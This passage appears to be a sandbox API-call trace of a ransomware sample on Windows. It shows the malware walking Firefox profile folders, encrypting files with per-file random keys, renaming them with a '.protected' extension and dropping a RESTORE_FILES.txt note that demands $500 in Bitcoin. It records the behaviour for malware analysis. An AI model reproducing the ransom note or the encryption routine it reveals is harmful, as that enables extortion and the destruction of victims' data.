(hObject=0x158) returned 1 [0086.598] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little.protected") returned 134 [0086.598] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\startupcache\\startupcache.4.little"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\startupcache\\startupcache.4.little.protected")) returned 1 [0086.599] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0086.599] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0086.599] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\RESTORE_FILES.txt") returned 120 [0086.599] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\startupcache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0086.599] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.599] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0086.600] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.600] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.600] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.601] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0086.601] CloseHandle (hObject=0x154) returned 1 [0086.601] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.601] lstrcmpiW (lpString1="thumbnails", lpString2="Windows") returned -1 [0086.601] lstrcmpiW (lpString1="thumbnails", lpString2="Program Files") returned 1 [0086.601] lstrcmpiW (lpString1="thumbnails", lpString2="Program Files (x86)") returned 1 [0086.601] lstrcmpiW (lpString1="thumbnails", lpString2="$Recycle.bin") returned 1 [0086.601] lstrcmpiW (lpString1="thumbnails", lpString2="System Volume Information") returned 1 [0086.601] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails") returned 100 [0086.601] lstrcmpW (lpString1="thumbnails", lpString2=".") returned 1 [0086.601] lstrcmpW (lpString1="thumbnails", lpString2="..") returned 1 [0086.601] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\*") returned 102 [0086.601] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0086.612] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.612] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.612] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.612] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.612] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.612] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\.") returned 102 [0086.613] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.613] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.613] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.613] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.613] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.613] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.613] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.613] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\..") returned 103 [0086.613] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.613] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.613] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.613] lstrcmpiW (lpString1="4cc87c1409819bf06f42b782d4902b2f.png", lpString2="Windows") returned -1 [0086.613] lstrcmpiW (lpString1="4cc87c1409819bf06f42b782d4902b2f.png", lpString2="Program Files") returned -1 [0086.613] lstrcmpiW (lpString1="4cc87c1409819bf06f42b782d4902b2f.png", lpString2="Program Files (x86)") returned -1 [0086.613] lstrcmpiW (lpString1="4cc87c1409819bf06f42b782d4902b2f.png", lpString2="$Recycle.bin") returned 1 [0086.613] lstrcmpiW (lpString1="4cc87c1409819bf06f42b782d4902b2f.png", lpString2="System Volume Information") returned -1 [0086.613] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png") returned 137 [0086.613] StrStrIW (lpFirst="4cc87c1409819bf06f42b782d4902b2f.png", lpSrch=".protected") returned 0x0 [0086.613] lstrcmpW (lpString1="4cc87c1409819bf06f42b782d4902b2f.png", lpString2="RESTORE_FILES.txt") returned -1 [0086.613] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.613] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.613] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.615] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png") returned 137 [0086.615] StrStrW (lpFirst="4cc87c1409819bf06f42b782d4902b2f.png", lpSrch=".txt") returned 0x0 [0086.615] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png") returned 137 [0086.615] StrStrW (lpFirst="4cc87c1409819bf06f42b782d4902b2f.png", lpSrch=".rar") returned 0x0 [0086.615] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png") returned 137 [0086.615] StrStrW (lpFirst="4cc87c1409819bf06f42b782d4902b2f.png", lpSrch=".zip") returned 0x0 [0086.615] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.622] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.622] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.622] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.622] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.622] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.622] CloseHandle (hObject=0x158) returned 1 [0086.623] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png.protected") returned 147 [0086.623] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png.protected")) returned 1 [0086.624] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.624] lstrcmpiW (lpString1="ba182bcd131f1f3c6b6fbbb1ba078341.png", lpString2="Windows") returned -1 [0086.624] lstrcmpiW (lpString1="ba182bcd131f1f3c6b6fbbb1ba078341.png", lpString2="Program Files") returned -1 [0086.624] lstrcmpiW (lpString1="ba182bcd131f1f3c6b6fbbb1ba078341.png", lpString2="Program Files (x86)") returned -1 [0086.624] lstrcmpiW (lpString1="ba182bcd131f1f3c6b6fbbb1ba078341.png", lpString2="$Recycle.bin") returned 1 [0086.624] lstrcmpiW (lpString1="ba182bcd131f1f3c6b6fbbb1ba078341.png", lpString2="System Volume Information") returned -1 [0086.624] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png") returned 137 [0086.624] StrStrIW (lpFirst="ba182bcd131f1f3c6b6fbbb1ba078341.png", lpSrch=".protected") returned 0x0 [0086.624] lstrcmpW (lpString1="ba182bcd131f1f3c6b6fbbb1ba078341.png", lpString2="RESTORE_FILES.txt") returned -1 [0086.624] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.624] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.624] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.625] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png") returned 137 [0086.625] StrStrW (lpFirst="ba182bcd131f1f3c6b6fbbb1ba078341.png", lpSrch=".txt") returned 0x0 [0086.625] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png") returned 137 [0086.625] StrStrW (lpFirst="ba182bcd131f1f3c6b6fbbb1ba078341.png", lpSrch=".rar") returned 0x0 [0086.625] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png") returned 137 [0086.625] StrStrW (lpFirst="ba182bcd131f1f3c6b6fbbb1ba078341.png", lpSrch=".zip") returned 0x0 [0086.625] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.630] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.631] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.631] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.631] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.631] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.631] CloseHandle (hObject=0x158) returned 1 [0086.631] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png.protected") returned 147 [0086.631] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png.protected")) returned 1 [0086.632] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.632] lstrcmpiW (lpString1="ce8c0453589216a67cddb50284fbfe8d.png", lpString2="Windows") returned -1 [0086.632] lstrcmpiW (lpString1="ce8c0453589216a67cddb50284fbfe8d.png", lpString2="Program Files") returned -1 [0086.632] lstrcmpiW (lpString1="ce8c0453589216a67cddb50284fbfe8d.png", lpString2="Program Files (x86)") returned -1 [0086.632] lstrcmpiW (lpString1="ce8c0453589216a67cddb50284fbfe8d.png", lpString2="$Recycle.bin") returned 1 [0086.632] lstrcmpiW (lpString1="ce8c0453589216a67cddb50284fbfe8d.png", lpString2="System Volume Information") returned -1 [0086.632] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png") returned 137 [0086.632] StrStrIW (lpFirst="ce8c0453589216a67cddb50284fbfe8d.png", lpSrch=".protected") returned 0x0 [0086.633] lstrcmpW (lpString1="ce8c0453589216a67cddb50284fbfe8d.png", lpString2="RESTORE_FILES.txt") returned -1 [0086.633] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.633] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.633] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.634] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png") returned 137 [0086.634] StrStrW (lpFirst="ce8c0453589216a67cddb50284fbfe8d.png", lpSrch=".txt") returned 0x0 [0086.634] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png") returned 137 [0086.634] StrStrW (lpFirst="ce8c0453589216a67cddb50284fbfe8d.png", lpSrch=".rar") returned 0x0 [0086.634] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png") returned 137 [0086.634] StrStrW (lpFirst="ce8c0453589216a67cddb50284fbfe8d.png", lpSrch=".zip") returned 0x0 [0086.634] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.642] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.642] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.642] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.642] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.647] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.647] CloseHandle (hObject=0x158) returned 1 [0086.647] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png.protected") returned 147 [0086.647] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png.protected")) returned 1 [0086.648] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0086.649] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0086.649] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\RESTORE_FILES.txt") returned 118 [0086.649] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0086.649] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique 